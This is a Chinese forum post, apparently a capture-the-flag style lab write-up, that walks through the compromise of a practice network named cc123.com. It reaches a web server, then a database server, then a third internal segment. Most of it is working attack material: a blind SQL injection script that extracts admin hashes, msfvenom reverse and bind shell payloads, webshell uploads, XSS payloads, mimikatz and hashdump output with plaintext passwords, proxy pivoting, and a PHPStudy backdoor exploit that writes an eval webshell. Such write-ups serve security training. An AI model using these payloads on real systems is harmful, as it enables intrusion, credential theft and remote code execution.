靶场实战|（net渗透，sockcap，msf多重网段渗透，验证码重放...

Grav1ty · 发表于 2022-5-2 01:57:26

靶场实战|（net渗透，sockcap，msf多重网段渗透，验证码重放漏洞，C#代码审计解密，wfuzz穷举subdomain）

欢迎大家一起来Hacking水友攻防实验室学习，渗透测试，代码审计，免杀逆向，实战分享，靶场靶机，求关注

masscan扫描
1. kali@kali:~$ sudo masscan -p 1-65535 192.168.0.134 --rate=1000
2. [sudo] kali 的密码：
3. Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-04-22 05:28:53 GMT
4. -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
5. Initiating SYN Stealth Scan
6. Scanning 1 hosts [65535 ports/host]
7. Discovered open port 49154/tcp on 192.168.0.134
8. Discovered open port 21/tcp on 192.168.0.134
9. Discovered open port 6588/tcp on 192.168.0.134
10. Discovered open port 135/tcp on 192.168.0.134
11. Discovered open port 80/tcp on 192.168.0.134
12. Discovered open port 3389/tcp on 192.168.0.134
13. Discovered open port 53/tcp on 192.168.0.134
14. Discovered open port 999/tcp on 192.168.0.134
15. Discovered open port 49155/tcp on 192.168.0.134
复制代码

2.nmap探测端口信息

kali@kali:~$ nmap -sC -A -p 49151,21,6588,13,80,3389,53,999,49122 192.168.0.134 -oA cc123-port
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-22 01:32 EDT
Nmap scan report for 192.168.0.134
Host is up (0.00094s latency).
PORT STATE SERVICE VERSION
13/tcp filtered daytime
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
999/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: phpMyAdmin
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-04-22T05:32:53+00:00; 0s from scanner time.
6588/tcp open http Microsoft IIS httpd 7.5
| http-cookie-flags:
| /:
| ASPSESSIONIDAATDDDCD:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: \xBB\xA4\xCE\xC0\xC9\xF1\xA1\xA4\xD6\xF7\xBB\xFA\xB4\xF3\xCA\xA6 V3.5.1 - \xC7\xB0\xCC\xA8\xB5\xC7\xC2\xBC
49122/tcp filtered unknown
49151/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.75 seconds
kali@kali:~$ nmap -sC -A -p 49151,21,6588,135,80,3389,53,999,49122 192.168.0.134 -oA cc123-port
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-22 01:34 EDT
Nmap scan report for 192.168.0.134
Host is up (0.00072s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
135/tcp open msrpc Microsoft Windows RPC
999/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: phpMyAdmin
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-04-22T05:35:26+00:00; 0s from scanner time.
6588/tcp open http Microsoft IIS httpd 7.5
| http-cookie-flags:
| /:
| ASPSESSIONIDAATDDDCD:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: \xBB\xA4\xCE\xC0\xC9\xF1\xA1\xA4\xD6\xF7\xBB\xFA\xB4\xF3\xCA\xA6 V3.5.1 - \xC7\xB0\xCC\xA8\xB5\xC7\xC2\xBC
49122/tcp filtered unknown
49151/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.23 seconds

复制代码

端口的一些信息

host的绑定

C:\Windows\System32\drivers\etc

192.168.0.134 www.cc123.com

注意主机好像不行，要在虚拟机里面才可以。

设置网关

kali@kali:~$ wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://cc123.com/
Total requests: 5000
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000030: 200 461 L 1272 W 22640 Ch "new"
000000001: 200 969 L 2160 W 43741 Ch "www"
000001176: 200 969 L 2160 W 43741 Ch "WWW"
000002700: 400 6 L 26 W 334 Ch "m."
000002795: 400 6 L 26 W 334 Ch "ns2.cl.bellsouth.net."
000002883: 400 6 L 26 W 334 Ch "ns1.viviotech.net."
000002885: 400 6 L 26 W 334 Ch "ns2.viviotech.net."
000003050: 400 6 L 26 W 334 Ch "ns3.cl.bellsouth.net."
000004081: 400 6 L 26 W 334 Ch "ferrari.fortwayne.com."
000004082: 400 6 L 26 W 334 Ch "jordan.fortwayne.com."
000004083: 400 6 L 26 W 334 Ch "quatro.oweb.com."
000000267: 200 931 L 1878 W 30822 Ch "ww2"

复制代码

子域名

http://www.cc123.com

http://ww2.cc123.com/

http://new.cc123.com

http://new.cc123.com/a/moon.php

在new.cc123.com下发现dedecms这个很多漏洞的cms，new.cc123.com/plus/flink.php查看版本，发现

查这个版本的历史漏洞，尝试getshell。

远程文件包含：

直接在谷歌搜索dedecms5,7的漏洞，但是！

没有能getshell的漏洞，所以还是请教大佬，发现dedecms5.7有sql注入漏洞：

Dedecms 20150618 注入漏洞(可注入管理员账户) - 开水网络

脚本来自乌云雨神：Dedecms 20150618 注入漏洞(可注入管理员账户) - 开水网络

（如果使用的时候总会默认打出第一个字母，说明本身延迟时间大于休眠时间，把sleep时间设置长就可以，cookie用火狐截取的）

import urllib2
import time
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'PHPSESSID=2f4morhngpe6bg9uqfvr4bfci0; DedeUserID=4; DedeUserID__ckMd5=f02b1d395cb070ca; DedeLoginTime=1633411658; DedeLoginTime__ckMd5=0dbeef1ea4aac9b3; last_vtime=1633411783; last_vtime__ckMd5=397e8a97a27223c3; last_vid=xyy; last_vid__ckMd5=b8cc6b124ee55ebd'))
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
name = ""
for i in range(1,21):
for p in payloads:
s1 = "%s" %(i)
s2 = "%s" %(ord(p))
s = "http://new.cc123.com/member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a'%20and%20`'`.``.mtypeid%20or%20if(ascii(substr((select%20pwd%20from%20dede_admin%20limit%201),"+s1+",1))%3d"+s2+",sleep(5),0)%20and%20mtypeid%3d1%23]=w&_FILES[mtypename][size]=.xxxx"
start_time = time.time()
try:
req = urllib2.Request(s)
req_data=opener.open(req,timeout=10)
if time.time() - start_time > 4.0:
name = name+p
print name+'.....'
except urllib2.URLError,e:
break
print 'password is %s' % name

复制代码

然后是跑账户，把pwd改为uname就可以，但是恶心的地方在于，刚才我们看到的member是前台登录，后台登录的地方是member/dede……

然后在“上传新文件”处一直没办法传一句话，所以换了一个地方传“文件式管理器”，这里可以传一句话php，为了免杀，我特意使用了

https://github.com/pureqh/webshell

使用方法如下图，参考

https://oatmeal.vip/web-security/learning/php-webshell/

然后我自己传成功：

可以访问一下url发现到底可以不可以，然后win7用蚁剑链接：

url写webshell的url，加参数?pass=pureqh,密码是zero

这个时候发现无法执行指令，只有在web文件夹下有权限，可以用插件市场的disablefunction绕过。失败。那就传大马，然后看可读写目录，传msf或者cs。

免杀msf马的制作参考我的之前的博客：

免杀手法学习（纯笔记为了方便查询基本是记录大佬链接水文）_热热的雨夜的博客-CSDN博客

但是蚁剑无法执行我们的exe文件，所以msf无法回连，这个时候就需要大马了，找到可读写目录，执行（大码的执行功能可能绕过蚁剑所不能过的执行。）我原本以为，在uploads目录下直接执行xyy.exe就可以，但是我错了，大码会报错：拒绝访问。于是需要用啊D工具检测可读可写的目录：

然后成功

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=12345 -f exe >s.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
meterpreter > getuid
Server username: IIS APPPOOL\newcc123
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.0.134 - Collecting local exploits for x86/windows...
[*] 192.168.0.134 - 29 exploit checks are being tried...
[+] 192.168.0.134 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

复制代码

这时候拿到了2个session，都是web服务器的，一个普通权限一个system。然后目录爆破ww2.cc123.com，但是发现，dirsearch没法跑出来，会报错超时。。burp suit跑，发现目录admin：

登录需要验证码，但是验证码可以重用src漏洞（首次验证码正确就可以一直用，可以用bp的intruder模块测试），如果验证码不变的情况下只改变账号密码，并且不会报错验证码错误而是报错账号密码错误，那就说明存在验证码重用漏洞，得到密码cc123.

而且这里也有登录框sql注入万能密码，就是admin’—然后密码随便什么都可以登录。

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 22 Apr 2020 07:45:39 GMT
Content-Length: 11541
.net
select * from users username= sql
sql net sa system user 普通
sqlmap 测试SQL注入
GET /admin/newsadd.aspx?id=536&pid=27 HTTP/1.1
Host: ww2.cc123.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://ww2.cc123.com/admin/newslist.aspx?pid=27
Cookie: The Cool Site=lao=5; CheckCode=48HN; ASP.NET_SessionId=ium1fsonutmowazyhrpkmcqn
Upgrade-Insecure-Requests: 1

复制代码

用AWVS或者bp的扫描漏洞功能，得到这里可能有sql注入漏洞，然后sqlmap跑：

站库分离

程序跟数据库不在一个服务器让这个数据服务器更加的安全数据更加安全。

开启不了xp——cmd，所以没法直接getshell。。。

经过无数尝试，最后在：

发现这里的注入可以getshell并且执行命令还能得到回显。（这个故事告诉我们，get型注入要比post型来的容易利用，因为post注入，多数是提交表单，本质上你传了数据去，未必能传对且不说，回显的页面甚至未必是你注入的页面。）

进去之后发现不是web服务器的ip，存在另一个10.10.1段，猜测可能是站酷分离。下面这张图，信息量巨大！！！！

Net框架的代码审计

位置和配置：

里面会有各式各样的dll和aspx：

从时间推断明显是一个伪静态页面……

protected void ImageButton1_Click(object sender, ImageClickEventArgs e)
{
      if (!(base.Request.Cookies["CheckCode"].Value == this.safecode.Text.Trim().ToUpper()))
      {
         base.Response.Write("<script>alert('验证码输入错误！');javascript:history.back(-1);</script>");
         return;
      }
      string sql = string.Concat(new string[]
      {
         "select*from admin where username='",
         this.username.Text.Trim(),
         "' and password='",
         StringClass.Encrypt(this.password.Text.Trim(), "yx139222"),
         "'"
      });
      DataSet tableData = DBClass.GetTableData(sql, "admin");
      if (tableData != null && tableData.Tables["admin"].Rows.Count > 0)
      {
         this.Session["users"] = this.username.Text.Trim();
         base.Response.Redirect("index.aspx");
         return;
      }
      base.Response.Write("<script>alert('姓名或密码输入错误！');javascript:history.back(-1);</script>");
}
}

// AdminCs
public static void CheckLoginState()
{
if (HttpContext.Current.Session["users"] == null)
{
HttpContext.Current.Response.Redirect("Login.aspx");
}
}

protected void Page_Load(object sender, EventArgs e)
{
      if (base.Request.QueryString["pid"] != null && base.Request.QueryString["pid"].ToString() != "")
      {
         this.pid = Convert.ToInt32(base.Request.QueryString["pid"].ToString());
      }
      AdminCs.CheckLoginState();
      if (!base.IsPostBack)
      {
         this.p.type(this.DropDownList1, this.pid.ToString());
         if (base.Request.QueryString["id"] != null)
         {
            this.Button1.Visible = false;
            this.Button2.Visible = true;
            string sql = "select*from news where id=" + base.Request.QueryString["id"].ToString();
            DataSet tableData = DBClass.GetTableData(sql, "sql");
            if (tableData.Tables["sql"].Rows.Count > 0)
            {
                  this.DropDownList1.SelectedValue = tableData.Tables["sql"].Rows[0]["type"].ToString();
                  this.Textbox1.Text = tableData.Tables["sql"].Rows[0]["title"].ToString();
                  this.txtProImg.Text = tableData.Tables["sql"].Rows[0]["images"].ToString();
                  this.content1.InnerHtml = tableData.Tables["sql"].Rows[0]["content"].ToString();
            }
         }
      }
}

后台编辑器上传漏洞

POST /editor/asp.net/upload_json.ashx?dir=file HTTP/1.1
Host: ww2.cc123.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------230818410427238763454090077855
Content-Length: 391
Origin: http://ww2.cc123.com
Connection: close
Referer: http://ww2.cc123.com/admin/newsadd.aspx?id=536&pid=27
Cookie: The Cool Site=lao=5; CheckCode=48HN; ASP.NET_SessionId=ium1fsonutmowazyhrpkmcqn
Upgrade-Insecure-Requests: 1
-----------------------------230818410427238763454090077855
Content-Disposition: form-data; name="localUrl"
C:\fakepath\2.html
-----------------------------230818410427238763454090077855
Content-Disposition: form-data; name="imgFile"; filename="2.html"
Content-Type: text/html
<script>alert(document.cookie)</script>
-----------------------------230818410427238763454090077855--
html txt

复制代码

文件上传

protected void UpImg_Click(object sender, EventArgs e)
{
      if (base.Request.Url.ToString().IndexOf("grcms.cn") > 0)
      {
         base.Response.Write("<script>alert('网站样例，不可以修改数据。');location.href='" + base.Request.Url.ToString() + "';</script>");
         return;
      }
      if (this.FileUpload1.PostedFile.ContentLength >= 500000)
      {
         base.Response.Write("<script language='javascript'>alert('你的图片已经超过500K的大小！');</script>");
         return;
      }
      string fileName = this.FileUpload1.FileName;
      string text = DateTime.Now.ToString("yyyyMMddhhmmss");
      fileName.Substring(fileName.LastIndexOf("\\") + 1);
      string text2 = fileName.Substring(fileName.LastIndexOf(".") + 1);
      if (text2 == "bmp" || text2 == "jpg" || text2 == "gif" || text2 == "JPG" || text2 == "BMP" || text2 == "GIF" || text2 == "png")
      {
         this.FileUpload1.SaveAs(string.Concat(new string[]
         {
            base.Server.MapPath("\\UpImg"),
            "\\",
            text,
            ".",
            text2
         }));
         "UpImg/" + text + "." + text2;
         this.txtProImg.Text = "UpImg/" + text + "." + text2;
         return;
      }
      base.Response.Write("<script language='javascript'>alert('支持格式：|jpg|gif|bmp|png|');</script>");
}

前台文件

<%@ page language="c#" runat="server" %>
<script language="c#" runat="server">
public string strStyle;
public string strtheurl;
public void Page_Load(Object src,EventArgs e)
{
NameValueCollection ServerVariables = Request.ServerVariables;
strStyle=Request.QueryString["style"];
strtheurl=ServerVariables["URL"].ToString();
strtheurl=strtheurl.Substring(0,strtheurl.IndexOf("mystat.aspx",0,strtheurl.Length));
strtheurl="http://"+ServerVariables["HTTP_HOST"].ToString()+strtheurl;
}
</script>
document.write("<script>var style='<%=strStyle%>';var url='<%=strtheurl%>';</script>")
_dwrite("<script language=javascript src="+url+"stat.aspx?style="+style+"&referer="+escape(document.referrer)+"&screenwidth="+(screen.width)+"></script>");
function _dwrite(string) {document.write(string);}
验证
http://ww2.cc123.com/mystat.aspx?style=%3C/script%3E%3Cscript%3Ealert(/xxs/);%3C/script%3E%3Cscript%3E
web.config 数据链接文件
<add key="ConnectionString" value="server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123.." />
admin AE5F6187F32825CA
cc123 B97C57DB005F954242450A255217DA9F

复制代码

分析解密

protected void ImageButton1_Click(object sender, ImageClickEventArgs e)
{
      if (!(base.Request.Cookies["CheckCode"].Value == this.safecode.Text.Trim().ToUpper()))
      {
         base.Response.Write("<script>alert('验证码输入错误！');javascript:history.back(-1);</script>");
         return;
      }
      string sql = string.Concat(new string[]
      {
         "select*from admin where username='",
         this.username.Text.Trim(),
         "' and password='",
         StringClass.Encrypt(this.password.Text.Trim(), "yx139222"),
         "'"
      });
      DataSet tableData = DBClass.GetTableData(sql, "admin");
      if (tableData != null && tableData.Tables["admin"].Rows.Count > 0)
      {
         this.Session["users"] = this.username.Text.Trim();
         base.Response.Redirect("index.aspx");
         return;
      }
      base.Response.Write("<script>alert('姓名或密码输入错误！');javascript:history.back(-1);</script>");
}
}

加密 DESC

public static string Encrypt(string pToEncrypt, string sKey)
{
DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();
byte[] bytes = Encoding.Default.GetBytes(pToEncrypt);
dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);
dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);
MemoryStream memoryStream = new MemoryStream();
CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateEncryptor(), CryptoStreamMode.Write);
cryptoStream.Write(bytes, 0, bytes.Length);
cryptoStream.FlushFinalBlock();
StringBuilder stringBuilder = new StringBuilder();
byte[] array = memoryStream.ToArray();
for (int i = 0; i < array.Length; i++)
{
byte b = array;
stringBuilder.AppendFormat("{0:X2}", b);
}
stringBuilder.ToString();
return stringBuilder.ToString();
}

解密的函数

public static string Decrypt(string pToDecrypt, string sKey)
{
DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();
byte[] array = new byte[pToDecrypt.Length / 2];
for (int i = 0; i < pToDecrypt.Length / 2; i++)
{
int num = Convert.ToInt32(pToDecrypt.Substring(i * 2, 2), 16);
array = (byte)num;
}
dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);
dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);
MemoryStream memoryStream = new MemoryStream();
CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Write);
cryptoStream.Write(array, 0, array.Length);
cryptoStream.FlushFinalBlock();
new StringBuilder();
return Encoding.Default.GetString(memoryStream.ToArray());
}

在web。Config文件下得到连接数据库主机的key：

连接之后得到这两个的密文，但是需要解密，那怎么办呢？用md5破解，发现不是，，那怎么办呢？？记得之前.net下有加密解密的函数。所以，用vstdtd写一个C#函数解密之。
admin cc123
cc123 qweasd123
WEB服务器
192.168.0.134
10.10.10.128
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.0.0/255.255.255.0
哈希明文密码都要获取
hash msf下输入run hashdump：
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::
load mimikatz或者load kiwi ，然后creds_all，发现不行，迁移到另一个system的64位进程中再次执行creds_all，发现可以，得到：

当然，mimikataz更牛逼：
load mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
wdigest
tspkg
meterpreter > tspkg
[+] Running as SYSTEM
Retrieving tspkg credentials
tspkg credentials
=================
AuthID    Package Domain          User             Password
------    ------- ------          ----             --------
0;4477316 Negotiate  IIS APPPOOL    ww2cc123
0;4472186 Negotiate  IIS APPPOOL    newcc123
0;788760 Negotiate  IIS APPPOOL    PhpMyAdmin_HWS
0;738644 Negotiate  IIS APPPOOL    DefaultAppPool
0;46852    NTLM
0;4238053 Negotiate  IIS APPPOOL    cc123
0;995    Negotiate  NT AUTHORITY    IUSR
0;997    Negotiate  NT AUTHORITY    LOCAL SERVICE
0;999    NTLM    WORKGROUP       WIN-KALKEMT3JMA$
0;365377 NTLM    WIN-KALKEMT3JMA  Administrator    !@#Qwe123.
0;111086 NTLM    WIN-KALKEMT3JMA  MySQL_HWS       5f 00 48 00 68 00 38 00 40 00 69 00 4f 00 77 00 40 00 40 00 54 00 73 00 37 00 59 00 4b 00 71 00 64 00 57 00 4a 00 32 00 09 ff 57 00 4a 00 32 00 77 00 6d 00 54 00 61 00 46 00 28 00
0;4243573 NTLM    WIN-KALKEMT3JMA  cc123          Ht6_ifp6nvkjn
0;5777743 NTLM    WIN-KALKEMT3JMA  newcc123       ZtKGmDj0qEbDECSBl5p
0;996    Negotiate  WORKGROUP       WIN-KALKEMT3JMA$  n.s. (SuppCred KO) /
0;13904747  NTLM    WIN-KALKEMT3JMA  ww2cc123       xwSggtdWvl42JGHivMX
超级管理员的账号和密码
Administrator    !@#Qwe123.
多重网段内网渗透
msf增加路由然后添加代理：

Proxychains开设代理。（本地ip或者192.168.0.128的kali 的ip也行，图是错的ip，实际上应该是192.168.0.128）

然后现在用代理的nmap去扫描数据库服务器：sock4只能tcp（ip是借鉴的）

数据库服务器
TCP 0.0.0.0:80          0.0.0.0:0             LISTENING    4
  TCP 0.0.0.0:135          0.0.0.0:0             LISTENING    692
  TCP 0.0.0.0:445          0.0.0.0:0             LISTENING    4
  TCP 0.0.0.0:1433          0.0.0.0:0             LISTENING    1152
  TCP 0.0.0.0:2383          0.0.0.0:0             LISTENING    1180
  TCP 0.0.0.0:47001       0.0.0.0:0             LISTENING    4
  TCP 0.0.0.0:49152       0.0.0.0:0             LISTENING    368
  TCP 0.0.0.0:49153       0.0.0.0:0             LISTENING    740
  TCP 0.0.0.0:49154       0.0.0.0:0             LISTENING    836
  TCP 0.0.0.0:49155       0.0.0.0:0             LISTENING    484
  TCP 0.0.0.0:49160       0.0.0.0:0             LISTENING    476
  TCP 0.0.0.0:49161       0.0.0.0:0             LISTENING    1928
  TCP 10.10.1.128:139       0.0.0.0:0             LISTENING    4
  TCP 10.10.10.136:139    0.0.0.0:0             LISTENING    4
  TCP 10.10.10.136:1433    10.10.10.128:51719    ESTABLISHED    1152
  TCP 127.0.0.1:1434       0.0.0.0:0             LISTENING    1152
  TCP [::]:80             [::]:0                LISTENING    4
  TCP [::]:135             [::]:0                LISTENING    692
  TCP [::]:445             [::]:0                LISTENING    4
  TCP [::]:1433             [::]:0                LISTENING    1152
  TCP [::]:2383             [::]:0                LISTENING    1180
  TCP [::]:47001          [::]:0                LISTENING    4
  TCP [::]:49152          [::]:0                LISTENING    368
  TCP [::]:49153          [::]:0                LISTENING    740
  TCP [::]:49154          [::]:0                LISTENING    836
  TCP [::]:49155          [::]:0                LISTENING    484
  TCP [::]:49160          [::]:0                LISTENING    476
  TCP [::]:49161          [::]:0                LISTENING    1928
  TCP [::1]:1434          [::]:0                LISTENING    1152
  UDP 0.0.0.0:500          *:*                                  836
  UDP 0.0.0.0:4500          *:*                                  836
  UDP 0.0.0.0:5355          *:*                                  1004
  UDP 10.10.1.128:137       *:*                                  4
  UDP 10.10.1.128:138       *:*                                  4
  UDP 10.10.10.136:137    *:*                                  4
  UDP 10.10.10.136:138    *:*                                  4
  UDP 127.0.0.1:59015       *:*                                  1996
  UDP [::]:500             *:*                                  836
  UDP [::]:4500             *:*                                  836
生成一个正向攻击载荷
kali@kali:~/cc123$ msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe >bind.exe
[-] No platform was selected, choosing Msf::Module:latform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 309 bytes
Final size of exe file: 73802 bytes

从网卡的角度理解，似乎更贴近生活……目前我们只构造了从192.168.0.134去往10.10.10.0/24网段的单向路由，也就是可以从192.168.0.134----à10.10.10.136可以走，但是从10.10.10.136（数据库服务器）到192.168.0.134不能走，所以要bind……
主动连接
把xp-cmd-shell下，把bind.exe传上去：

执行之，并且，先监听。。。
msf5 auxiliary(server/socks4a) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 10.10.10.136
rhost => 10.10.10.136
msf5 exploit(multi/handler) > set lport 13777
lport => 13777
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
Payload options (windows/meterpreter/bind_tcp):
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
EXITFUNC  process       yes    Exit technique (Accepted: '', seh, thread, process, none)
LPORT    13777          yes    The listen port
RHOST    10.10.10.136    no       The target address

拿到meterpreter：

哈希
Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : WIN-JJU7KU45PN7
BootKey : 80efd2012ab381e9c0339c98850a5ef8
Rid  : 500
User : Administrator
LM :
NTLM : 15132c3d36a7e5d7905e02b478979046
Rid  : 501
User : Guest
LM :
NTLM :
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[1] { WIN-JJU7KU45PN7 ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
查看路由：

改路由：

目标WEB服务器

own: 989 closed ports
PORT    STATE SERVICE
80/tcp open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
3306/tcp  open  mysql
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
访问80端口
proxychains3 firefox http://10.10.1.129
phpstudy
2016 2014 2018 存在后门  php-5.2.17、php-5.4.45
利用脚本：https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp
编写后门利用工具
eval 就是可以执行php代码
system(‘’)
#conding:utf-8
import requests
import sys
import base64
shell = "system('"+sys.argv[1]+"');"
shell_base64 = base64.b64encode(shell.encode('utf-8'))
header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'}
def exploit(url):
html = requests.get(url=url,headers=header).text
return html
url = "http://10.10.1.129/"
print(exploit(url))
"echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"

SocksCap64 代理访问第三层网络，拿到最后的shell

		自动登录	找回密码
密码			立即注册